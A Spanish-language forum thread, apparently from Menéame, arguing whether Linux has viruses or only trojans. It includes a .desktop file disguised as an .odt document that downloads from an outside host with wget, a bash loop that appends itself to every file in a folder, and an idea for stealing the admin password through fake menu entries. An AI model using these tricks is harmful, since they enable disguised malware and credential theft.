#5 Eso no es un virus, es una cabronada

#8 Será porque los usuarios de Linux sabemos que SI hay Troyanos para Linux. Como es el caso de la noticia. Lo que NO hay es virus.

HOYGAN ES AKI ONDE HENSEÑA A ASER TROIANO O BIRUH O LO KE COÑO SEA PAL UVUNTU.COM???!!!

#8 Hola soy un usuario de windows que te a votado negativo y tu actitud si que da pena.

Dá igual cómo lo programes, mientras necesites intervención humana, no será un virus

#13 El usuario no tiene que cambiar la configuracion de escritorio... solo hacer doble click en el archivo ".desktop" que no necesita permisos de ejecución para poderse ejecutar y que además aparece en GNOME/KDE sin mostrar la extensión y con la posibilidad de cambiar el icono a otro.

Osea que puedes camuflarlo para que parezca un "text.odt" con su icono y todo, y que se ejecute al hacer click sin ningún problema.

La cosa es que si esto realmente se empezase a hacer, los de GNOME y KDE no tardarían en cambiar un par de cosas para evitarlo.

#28 por algún motivo tu ejemplo no me funciona, pero me he puesto a jugar un poco y además he encontrado la forma de que el propio .desktop sea ejecutable como script sh y a la vez como .desktop:
========= fichero test.desktop =============
Ignore= /tmp/jaja

===== fin de fichero test.desktop =========

No funcionará si el .desktop no se guarda como "test", pero se pueden modificar los parametros del 'find' para que busque -name '*.desktop' y un tamaño determinado, o que compruebe que empieza por Ignore=.
~
~
~
~

#27 El ejemplo es tan sencillo que te lo puedes crear tu mismo.

Abre el editor de texto y crea un nuevo archivo que ponga...

[Desktop Entry]
Type=Application
Encoding=UTF-8
Version=1.0
Name=caperucita.odt
Icon=/usr/share/icons/hicolor/32x32/mimetypes/openofficeorg3-oasis-text.png
Exec=/bin/bash -c 'cd ~; wget http://www.fugly.com/media/IMAGES/Funny/owned_kid.jpg; mv owned_kid.jpg PODRIA SER VIRUS.jpg '

Grabalo con el nombre "loquesea.desktop".
No tienes que darle ningún permiso de ejecución de ninguna clase.

Si abres con el explorador de KDE/GNOME la carpeta donde se bajó verás un odt... al hacerle doble click te descargará un archivo en tu carpeta de usuario... que si quisieramos podría ser un script malicioso que podríamos ejecutar automáticamnete desde ese mismo archivo desktop y a partir de ahí se autoreplicara por todo tu directorio de usuario y todas las interfaces de red o de disco a las que tu usuario tenga acceso que no requieran contraseña.

#19 Me parece que no sabes lo que es el teorema de recursión, si lo supieras sabrías que lo que dices no es posible...

#16 No acabas de entender, ni de leer. Que son pruebas de concepto!!

Go to #15

#16 Bueno... la existencia de virus en cualquier sistema operativo es un teorema clásico de teoría de la computabilidad, (consecuencia del primer teorema de recursión). Pero de ahí a que se pueda programar... va un abismo.

#19 Aunque haya dinero de por medio no puedes curar un cancer o un SIDA. El dinero de por medio no soluciona mas que cuatro cosas que maquilla.

Habla de un software que no es capaz de replicarse a si mismo.

ESO NO ES UN VIRUS. Troyano en todo caso.

#1 Me te adelantaste

#8 Alguien en su día mandó esto para desmentir el falso mito de que en gnu/linux no existen los virus, los cuales son meras pruebas de concepto (http://es.wikipedia.org/wiki/Prueba_de_concepto)

Virus en GNU/Linux ¿realidad o mito?

Hace 18 años | Por --761-- a e-ghost.deusto.es

Publicado hace 18 años por --761-- a e-ghost.deusto.es

Virus en GNU/Linux ¿realidad o mito?

e-ghost.deusto.es

#32 Me abre una ventana diciendo que hubo un error al lanzar la aplicación. Y nada más.. no sale nada por stderr ni stdout. Uso GNOME en Ubuntu 8.10. Tal vez sea algo del copia pega de meneame, algo parecido a lo que pasaría con el que puse yo en #28.

#6 pero es que los viruses hacen cabronadas no?

#29 También me da un error al ejecutar el tuyo.

#29 Juas, mu currao. Así funcionará incluso sin conexion a internet.
Aunque bajar automáticamente el script de internet tiene la ventaja de que puedes actualizar la version del virus a distancia

Creo que al postear en meneame mi ejemplo se ha trastocado un poco el texto.. las barras invertidas antes de los espacios en "PODRIA SER VIRUS" no aparecen, y a lo mejor es una de las razones por las que no funciona.

En la página también hablan de la posibilidad de substituir desde la configuracion de ususario los ficheros .desktop de las entradas del menu de GNOME para que al ejecutar synaptic en realidad se ejecute el script, consiguiendo la contraseña de administrador.

La verdad es que tal como está ahora GNOME y KDE podrían aparecer virus chungos para Linux. Pero también es mucho más facil inmunizar un sistema Linux que uno Windows con un par de arreglos.

En Bash scripting:

#!/bin/sh
for FICHERO in *
do
tail -4 $0 >> $FICHERO
done

Rápido y sencillo.

#22 No sé, pero me han dicho que estos usuarios de GNU/Linux no tienen problemas de liquidad: http://www.nsa.gov/research/selinux/index.shtml
Ni crisis mediante.
Ni parece que tampoco estos (¿te suena el cuento del ordenador más potente del mundo y sus 490 hermanitos?) tampoco: http://www.top500.org/system/9707

#31 y cual es el error, por curiosidad?
Mientras he hecho pruebas ha podido funcionar o no, pero nunca mostraban ningún error.

Puede que versiones de GNOME más nuevas que la mía, o en KDE, no se permita que la primera linea sea diferente de "[Desktop Entry]"

#25 ¿no hay un ejemplo por ahí para probarlo y salir de dudas?

Como se un hijo de la gran... en 5 pasos.
No desperdicieis vuestro talento en hacer daño.

próximo capitulo:

"Como infectar con salmonela pasteles de crema."

Un poco de ética no viene mal.